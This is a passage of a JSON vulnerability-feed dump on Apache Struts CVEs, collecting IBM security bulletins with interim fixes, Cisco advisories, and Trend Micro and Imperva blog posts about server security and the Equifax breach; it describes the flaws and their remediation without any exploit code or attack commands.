Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-04T09:04:41", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-11-04T09:04:41", "id": "3477DD0939B4B8CC59240F8DCC09305A2F7C13CA45285602F1755CDF6F593B52", "href": "https://www.ibm.com/support/pages/node/6359443", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:44:04", "description": "## Summary\n\nVulnerabilities in Apache Struts affect IBM Tivoli Application Dependency Discovery Manager (CVE-2019-0233, CVE-2019-0230)\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n**DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n**CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n**DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM Tivoli Application Dependency Discovery Manager | 7.3.0.7 \n \n## Remediation/Fixes\n\n**Fix** | **VRMF** | **APAR** | **How to acquire fix** \n---|---|---|--- \nefix_struts2.5.22_FP7200218.zip | 7.3.0.7 | None | [Download eFix](<https://www.secure.ecurep.ibm.com/download/?id=UpR3LS6M2oBcbLFNfcXFzqCsw2d008xhOwZDwfQ15h0> \"Download eFix\" ) \n \nPlease get familiar with eFix readme in etc/<efix_name>_readme.txt\n\n## Workarounds and Mitigations\n\nThe above eFix is applicable can be downloaded and applied directly.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T13:33:14", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache Struts affect IBM Tivoli Application Dependency Discovery Manager.", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2021-04-13T13:33:14", "id": "35DB525D4E07A09A6F2976ED4B93F380507E2F51F096B5749BE6E096C57DD8BD", "href": "https://www.ibm.com/support/pages/node/6347964", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "trendmicroblog": [{"lastseen": "2019-01-03T16:25:04", "description": "\n\n### **A Changing Landscape**\n\nIn recent years we\u2019ve seen a fundamental shift in the IT landscape, accelerated towards cloud and containerized infrastructures. According to Forbes, by 2020 it is predicted that 83 percent of enterprise workloads will be in the cloud. Moving beyond the cloud, software development teams are driving further change with the adoption of microservice architectures and containers, a market poised to grow over 40 percent year over year. The adoption of these new technologies signals a major change in IT infrastructures for modern enterprises. However, this transition is not always seamless, and it can be difficult to refactor legacy applications for a new technology stack. As a result, teams are building and deploying applications across a variety of environments, including physical machines, virtual machines, containers, and cloud infrastructures. While these new technologies offer great benefits in terms of agility, scalability, and continuous integration (CI)/continuous delivery (CD), they also add a layer of complexity to security that can expose the organization to vulnerabilities and threats. Overall, the combination of new application technology with existing legacy architectures and deployment models leads to greater IT complexity, making it extremely difficult to achieve consistent security across the organization.\n\n### **A Growing Threat to Servers**\n\nEnterprise security has traditionally been thought of as primarily an endpoint issue, however, the modernization of the IT landscape is resulting in attacks from all directions. Servers have become an important target for cybercrime, with more than 145 million U.S. citizens having their data compromised by the Equifax server breach. In recent years, we\u2019ve seen a number of high-profile server-targeted vulnerabilities. For example, the Equifax attack leveraged a server-side vulnerability in the Apache Struts web application framework, and Heartbleed directly targeted servers to reveal private data.\n\nServers are the workhorses of the IT environment, and server workloads have fundamentally different security requirements from traditional endpoint protection. As threats increase in sophistication, there is no single miracle fix to server protection. Rather, it requires multiple techniques through a layered security approach. Security and risk managers should utilize offerings dedicated to cloud workload protection, or cloud workload protection platforms (CWPP). As stated in Gartner\u2019s 2018 Market Guide, \u201cThe market for cloud workload protection platforms (CWPPs) is defined by offerings specifically designed for server workload-centric security protection and are typically agent-based for deep workload visibility and attack prevention capabilities.\u201d*** **\n\n### **Market-Leading Performance**\n\nAdditionally, Trend Micro believes that the Deep Security platform meets many capabilities and architectural considerations listed in Gartner\u2019s Market Guide for Cloud Workload Protection Platforms.\n\nDeep Security offers recommendations through the following:\n\n| \n\n * Seamless integration with leading environments, including AWS, Azure\u00ae, and VMware\u00ae\n * Complete visibility and protection of workloads\n * Automatic discovery and deployment of security controls\n * Security integrated with your DevOps team\u2019s toolsets\n * Support for microservices architectures and Docker\u00ae container protection \n---|--- \n| \n \nThis is all done with minimal impact on performance, allowing companies to maintain their agility without sacrificing security. [Learn more](<https://www.trendmicro.com/en_us/business/products/hybrid-cloud.html>) about our Hybrid Cloud Security solutions, and [contact us](<https://www.trendmicro.com/en_us/business/get-info-form.html>) to discover what makes Trend Micro the number one provider of corporate server security.\n\n##### _Sources:_\n\n##### _*Gartner, \u201cMarket Guide for Cloud Workload Protection Platforms\u201d, Neil MacDonald, 26 March 2018 G00328483. _\n\n##### _451 Research\u2019s Market Monitor: Cloud Enabling Technologies, Q3 2016_\n\n##### _Trend Micro, \u201cCritical Remote Code Execution Vulnerability (CVE-2018-11776) Found in Apache Struts\u201d_\n\n##### _<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/critical-remote-code-execution-vulnerability-cve-2018-11776-found-in-apache-struts>_\n\nThe post [Server Security for the Modern IT Ecosystem](<https://blog.trendmicro.com/server-security-for-the-modern-it-ecosystem/>) appeared first on [](<https://blog.trendmicro.com>).", "cvss3": {}, "published": "2019-01-03T15:30:46", "type": "trendmicroblog", "title": "Server Security for the Modern IT Ecosystem", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2019-01-03T15:30:46", "id": "TRENDMICROBLOG:F79486D4EB7A8032A33EF8200A559E62", "href": "https://blog.trendmicro.com/server-security-for-the-modern-it-ecosystem/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-07T13:45:17", "description": "\n\nOne year ago today, Equifax suffered what remains one of the largest and most impactful data breaches in U.S. history. Last September, it was revealed that the personal information of [145 million Americans](<https://www.equifaxsecurity2017.com/frequently-asked-questions/>), almost [700,000 UK citizens](<https://www.equifax.co.uk/incident.html>), and [19,000 Canadians](<https://www.cbc.ca/news/business/equifax-canadians-affected-update-1.4424066>) was stolen by cybercriminals.\n\nThis information included names, addresses, birthdays, Social Security numbers, and\u2014in some cases\u2014driver's licenses. All critical, personally identifiable information (PII) that can resold in the underground and used to commit identity fraud.\n\nThis breach had very real impact on the millions affected. On Equifax? Or the industry as a whole? Not so much\u2026\n\nThe result is that your personal information remains \"entrusted\" with various agencies without your knowledge. Agencies that may or may not have your best interests at heart. A year after the Equifax breach, your data has never been at greater risk. **Why?**\n\nThe Equifax breach made international headlines for weeks. It's a story that has corporate intrigue, political uproar, and controversy\u2026yet nothing really has changed.\n\n## What Happened?\n\nCybercriminals gained access to Equifax's systems through a [known vulnerability](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>) in Apache Struts (a web application framework). This easily exploited vulnerability has been left unpatched and unmitigated by Equifax for weeks.\n\nWhen Equifax discovered the breach, they waited weeks to notify affected individuals and the general public. That notification came in the form of an insecure site on a new domain name. This contributed to the [criticism](<https://en.wikipedia.org/wiki/Equifax#Criticism>) the company faced as they bumbled the response.\n\n[The saga](<https://en.wikipedia.org/wiki/Equifax#May\u2013July_2017_data_breach>) took a number of twists and unexpected turns as [executives were accused](<https://www.theglobeandmail.com/business/international-business/us-business/article-former-equifax-employee-charged-in-us-with-insider-trading/>) of [insider trading](<https://www.theguardian.com/business/2018/mar/14/equifax-insider-trading-data-breach-jun-ying-charged>), having sold shared valued at $1.8 million dollars after the breach was discovered but before the public announcement. The [CIO and CISO](<https://techcrunch.com/2017/09/15/equifax-security-and-information-executives-are-stepping-down/>) stepped down in the wake of the breach. As the company continued to see pushback, political and consumer frustration, the [CEO eventually resigned](<https://www.npr.org/2017/09/26/553799200/equifax-ceo-richard-smith-resigns-after-backlash-over-massive-data-breach>) allowing the company to try and turn the page.\n\nAfter all, Equifax had the tools, people, and process in place to prevent the breach but simply dropped the ball\u2026with catastrophic results.\n\n## Customers?\n\nOne of the biggest challenges in light of this breach was the relationship that Equifax had with the affected individuals. Equifax maintained a significant amount of [personally identifiable information](<https://en.wikipedia.org/wiki/Personally_identifiable_information>) on hundreds of millions of individuals in the US and around the world yet very few of these individuals had a direct relationship with the company.\n\nEquifax and a handful of other [consumer credit reporting agencies](<https://www.thebalance.com/who-are-the-three-major-credit-bureaus-960416>) make their money by selling customer profiles and credit ratings to other business, essentially acting as massive reputation clearing houses.\n\nGiven the role played by these agencies, individuals in the US have alarmingly few actions they can take in recourse to an error or breach of their information in care of such an agency. This was a key point raised in the uproar after the Equifax breach.\n\nOne year later, let's check in on the progress made so far\u2026\n\n## Lack of Personal Data Protections\n\nAlarmingly, there has been no federal action and only one state has passed legislation regarding personal data protections since the Equifax breach.\n\nIn June, California passed the California Consumer Privacy Act of 2018 ([AB 375](<https://leginfo.legislature.ca.gov/faces/billTextClient.xhtml?bill_id=201720180AB375>)). This landmark legislation takes a much needed step towards personal data protections in the state of California. While not [the driving factor](<https://www.nytimes.com/2018/05/13/business/california-data-privacy-ballot-measure.html>) for the legislation, the breach contributed to awareness of the need for such protections.\n\nThis protects Californian's in a similar manner to European's under GDPR. If either piece of legislation was in effect during the Equifax breach, the company [would have been looking at major fines](<https://www.darkreading.com/equifax-avoided-fines-but-what-if-/a/d-id/1332487?>).\n\n## What Now?\n\nDespite the initial uproar, very little has happened in wake of the Equifax breach. The creation of strict regulation in the EU had been underway for years. The initiative in California had already been underway when this breach happened.\n\nDespite the outrage, very little came of the breach outside of Equifax itself. They brought in new leadership and have tried to [shift the security culture](<https://www.wired.com/story/equifax-security-overhaul-year-after-breach/>), both solid steps. The [consent letter](<http://www.latimes.com/business/la-fi-equifax-settlement-20180627-story.html#>) signed will help ensure that Equifax continues to build a strong security culture but it doesn't impact any of the other agencies.\n\nIs this the future? As more and more companies move to monetize data and customer behaviours, a [lack of political will](<https://www.axios.com/after-equifaxs-mega-breach-nothing-changed-1536241622-baf8e0cf-d727-43db-b4d4-77c7599fff1e.html>) and a lack of consumer pressure means that **YOUR** data remains at risk.\n\nRegulation is always challenging but it's clear that the market isn't providing a solution as few of the affected individuals have a relationship with the companies holding the data. Your personal information is just that\u2026yours and very personal.\n\nIndividuals need the ability to hold organizations that put that information at risk accountable.\n\nThe post [Sound, Fury, And Nothing One Year After Equifax](<https://blog.trendmicro.com/sound-fury-and-nothing-one-year-after-equifax/>) appeared first on [](<https://blog.trendmicro.com>).", "cvss3": {}, "published": "2018-09-07T12:00:34", "type": "trendmicroblog", "title": "Sound, Fury, And Nothing One Year After Equifax", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-09-07T12:00:34", "id": "TRENDMICROBLOG:71F44A4A56FE1111907DD39C26B46152", "href": "https://blog.trendmicro.com/sound-fury-and-nothing-one-year-after-equifax/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-26T21:16:51", "description": "\n\n**_\u201cThere are no threats for Linux servers. Aren\u2019t they built to be secure?\u201d_**\n\n**_\u201cLinux servers are secure and hardened, why do we need additional security controls on those?\u201d_**\n\n**_\u201cI do understand there are threats out there but I am not aware of any major attacks on Linux servers\u201d_**\n\nIf you find yourself nodding as you read these statements, you\u2019re not alone.\n\nThere is a common belief that Linux servers are more secure and less vulnerable than Windows servers.\n\nAlthough there is some truth in the belief, the reality is that Linux servers (and the applications they host) also have vulnerabilities and by ignoring this, you are putting your business at unnecessary risk.\n\n**Widespread and increasing use**\n\nThere was a time not too long ago when Linux was a \u2018geek\u2019 OS, the domain of command line management and limited enterprise use. Those days are definitely gone, clearly illustrated by things like Gartner pegging the global OS growth for Linux at 13.5%[1], as well as the prevalence of Linux in the public cloud environment, as demonstrated by the fact that [approximately 90% of workloads in AWS EC2](<http://thecloudmarket.com/stats#/by_platform_definition>) are running some variant of Linux. With such widespread use for sensitive enterprise applications, it\u2019s no small wonder that there is an increasing focus on attacking Linux servers, as evidenced in the recent ransomware attack in South Korea that used a [Linux-focused ransomware attack called Erebus](<https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/erebus-linux-ransomware-impact-to-servers-and-countermeasures>) that impacted the web sites, databases, and multi-media files of 3,400 businesses.\n\n**Secure, but still vulnerable**\n\nWith more and more servers moving beyond the enterprise boundary and into the cloud, network protection at the host-level becomes increasingly important, as workloads need to defend themselves vs. having a perimeter around them. And remember, workloads include the applications that sit on top of Linux\u2026it\u2019s more than just the OS.\n\nHaving a host-based Intrusion Prevention System (IPS) will help protect against vulnerabilities in core operating system AND the application stack running on top. Great examples of network-accessible vulnerabilities with wide-spread impacts are the recent [Apache Struts-2](<http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2017-5638-apache-struts-vulnerability-remote-code-execution/>) issue, Heartbleed and Shellshock, but there are many more. And just because a vulnerability, like Heartbleed, is a couple years old doesn\u2019t mean that applications and servers are not still vulnerable. In a recent Shodan survey, it showed that Heartbleed was still an available vulnerability on more than 180,000 servers around the world, with the majority of them in the US!\n\n[1] Gartner, \u201cMarket Share Analysis: Server Operating Systems, Worldwide, 2016\u201d, ID#G00318388, May 26, 2017\n\n\n\nIf you run a web server on Linux (running on at least 37 percent of the web servers out there according to [W3Techs](<https://w3techs.com/technologies/details/os-linux/all/all>)), you need protection against vulnerabilities affecting them, including Apache, Nginx, etc.\n\n \n\n** ** | **Vulnerabilities Covered in and after 2014 (approx.)** | **Before 2014 (approx.)** | **Total** \n---|---|---|--- \n**Non-Windows OS and Core Services** | **80** | **230** | **310** \n**Web Servers** | **114** | **472** | **586** \n**Application Servers** | **255** | **319** | **574** \n**Web Console/Management Interfaces** | **113** | **453** | **566** \n**Database Servers** | **10** | **218** | **228** \n**DHCP, FTP, DNS servers** | **9** | **82** | **91** \n \n_Table 1: Vulnerabilities Protected by Deep Security_\n\n \n\nIt is very important to not confuse vulnerabilities with threats. While there may be fewer known threats for Linux, if you look at the National Vulnerability Database, there are a similar number of vulnerabilities reported for both [Linux](<https://nvd.nist.gov/vuln/search/results?adv_search=false&form_type=basic&results_type=overview&search_type=all&query=linux>), and [Windows](<https://nvd.nist.gov/vuln/search/results?adv_search=false&form_type=basic&results_type=overview&search_type=all&query=windows>) operating systems.\n\n**Malware, designed for Linux**\n\nContrary to popular belief, there is a lot of malware for the Linux platform. While the numbers in comparison to Microsoft Windows are not quite as high, there are still tens of thousands of pieces of malware designed for Linux, including the [Erebus ransomware](<https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/erebus-linux-ransomware-impact-to-servers-and-countermeasures>) mentioned above.\n\nDeploying ONLY anti-malware is inadequate for protecting servers. However, most attacks on datacenters that lead to breach involve the installation of malware as part of the attack chain. This is why compliance and security frameworks such as PCI-DSS (Section #3), SANS CIS Critical Security Controls (Section #8), and NIST Cybersecurity Framework (Section DE.CM-4) all continue to recommend anti-malware as a best practice.\n\n**Layered security for Linux workloads**\n\nIt\u2019s clear that there is no silver bullet when it comes to server security, and that businesses should be using a layered security approach to protect vulnerable Linux workloads. Beyond anti-malware and IPS, there are a number of controls that will help to build a robust Linux strategy:\n\n| \n\n * Application Control: helps \u2018lock down\u2019 the Linux host to prevent any unknown process or script from running. This prevents the malware from running in the first place or attackers from taking advantage of backdoors that it might have placed on the server.\n * Integrity Monitoring: A new threat is likely to make changes to the system somewhere (ports, protocol changes, files), so it\u2019s important to watch for these. Integrity monitoring helps with monitoring the system for any changes outside of an authorized change window, which tend to be few for typical production workloads.\n * Log Inspection: Scans log files and provides a continuous monitoring process to help identify threats early in the cycle. Attacks like SQL Injection, command injection, attacks against APIs can be seen in the logs and then action taken. \n---|--- \n| \n \nThe lesson we learn here is that although Linux is a more secure and reliable operating system option, it\u2019s not your cure-all solution when it comes to security. Like any other OS, some assembly and maintenance is required, and it\u2019s your responsibility to adopt a multi-layered security strategy, including managing regular updates and adding additional security controls to protect the servers AND the applications running on them. To learn more about Linux vulnerabilities and how to protect against them using Trend Micro Deep Security, [read our short research paper here.](<https://www.trendmicro.com/aws/wp-content/uploads/2017/03/Why_Security_for_Linux_Servers_June2017.pdf>)", "cvss3": {}, "published": "2017-06-15T19:00:13", "title": "Linux is secure\u2026right?", "type": "trendmicroblog", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-06-15T19:00:13", "href": "http://blog.trendmicro.com/linux-is-secureright/", "id": "TRENDMICROBLOG:5DA0AA0203F450ED9FF0CB21A89017BB", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cisco": [{"lastseen": "2023-05-25T14:43:46", "description": "A vulnerability in Apache Struts could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system.\n\nThe vulnerability exists because the affected software insufficiently validates user-supplied input, allowing the use of results with no namespace value and the use of url tags with no value or action. In cases where upper actions or configurations also have no namespace or a wildcard namespace, an attacker could exploit this vulnerability by sending a request that submits malicious input to the affected application for processing. If successful, the attacker could execute arbitrary code in the security context of the affected application on the targeted system.\nThe following Snort rules can be used to detect possible exploitation of this vulnerability: Snort SID 29639, 39190, 39191, and 47634\n\nThis advisory is available at the following link:\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts\"]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-23T20:00:00", "type": "cisco", "title": "Apache Struts Remote Code Execution Vulnerability Affecting Cisco Products: August 2018", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-17T18:52:00", "id": "CISCO-SA-20180823-APACHE-STRUTS", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T16:32:24", "description": "On March 6, 2017, Apache disclosed a vulnerability in the Jakarta Multipart parser used in Apache Struts2 that could allow an attacker to execute commands remotely on a targeted system by using a crafted Content-Type, Content-Disposition, or Content-Length value.\n\n This vulnerability has been assigned CVE-ID CVE-2017-5638.\n\nThis advisory is available at the following link:\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2 [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2\"]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-10T19:30:00", "type": "cisco", "title": "Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability Affecting Cisco Products", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-05-05T17:02:00", "id": "CISCO-SA-20170310-STRUTS2", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2018-08-23T17:31:04", "description": "On August 22, Apache Struts released a [security patch](<http://struts.apache.org/announce.html#a20180822-1>) fixing a critical remote code execution vulnerability. This vulnerability has been assigned CVE-2018-11776 (S2-057) and affects Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16. \n\nThe vulnerability was responsibly disclosed by Man Yue Mo from the Semmle Security Research team, check out a detailed description [here](<https://lgtm.com/blog/apache_struts_CVE-2018-11776>). An [exploit PoC ](<https://github.com/jas502n/St2-057/blob/master/README.md>)has already been published. \n\n[Imperva WAF](<https://www.imperva.com/products/application-security/web-application-firewall-waf/>) customers are protected out of the box against this vulnerability, no need for any special configuration on the customer end.", "edition": 2, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-23T14:25:36", "type": "impervablog", "title": "Read: Apache Struts Patches \u2018Critical Vulnerability\u2019 CVE-2018-11776", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-23T14:25:36", "id": "IMPERVABLOG:E9D83907E76B2B468512918F211FB65E", "href": "https://www.imperva.com/blog/2018/08/read-apache-struts-patches-critical-vulnerability-cve-2018-11776/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-09-12T15:28:21", "description": "## Key signs to look for in today\u2019s complex data threat landscape\n\n## Introduction\n\nThe most vulnerable data repositories are the ones deep in your organization\u2019s infrastructure. Everyone assumes they are safe, but as with your home, organizations must invest in security at entry points. Otherwise, the result is unsecured valuables lying around out in the open or easy to find in obvious closets or drawers.\n\nWhat happens to security when someone known to the homeowners, like a plumber, gardener, or friend, has access to the house? It becomes much easier for other people to exploit the homeowner and access the property.\n\nThe same principle applies to organizations. They deploy most of their security strategy on the perimeter and leave their \u201cdeep\u201d data repositories vulnerable to data breaches. Bad actors have the opportunity to exploit organization insiders or third-party software components. A [2022 Forrester report](<https://www.imperva.com/resources/resource-library/white-papers/forrester-insider-threats-drive-data-protection-improvements-full-report/>) revealed that 58 percent of sensitive data incidents are caused by insiders, either from non-malicious mistakes or deliberately malicious actions. The report also revealed that 82 percent of organizations do not have an insider risk management strategy or policy. It doesn\u2019t, however, have to be this way.\n\nYour data repositories contain the sensitive personal data of your business, employees, and customers, and, much like the valuables around your home, you should have a security strategy to safeguard them effectively. Staying with the home security metaphor, you need to consider turning the containers of your valuables into secure vessels, minimizing the number of people who could secure access, and gaining the ability to inventory losses when they happen. In data security, this means encryption, minimal entitlements, access control, and advanced analytics. Forrester data suggests, however, that not all organizations understand how to create an effective data security strategy, and their biggest mistake is not effectively addressing the insider threat.\n\nTwo critical business trends contribute to the ease with which bad actors can sneak undetected into your organization's infrastructure and breach sensitive data, and we address them in this post. Next, we\u2019ll explain general data breach attack flows and profile typical attackers to help you gain a better understanding of who and what to look for. Finally, we\u2019ll make some recommendations on how you can integrate a modern data security fabric with existing tools to create an effective, sustainable data security strategy.\n\nThe cost of an intruder who has access to the \u201chouse\u201d on an ongoing basis cannot be overstated. Every day, bad actors can exploit your vulnerable data repositories and 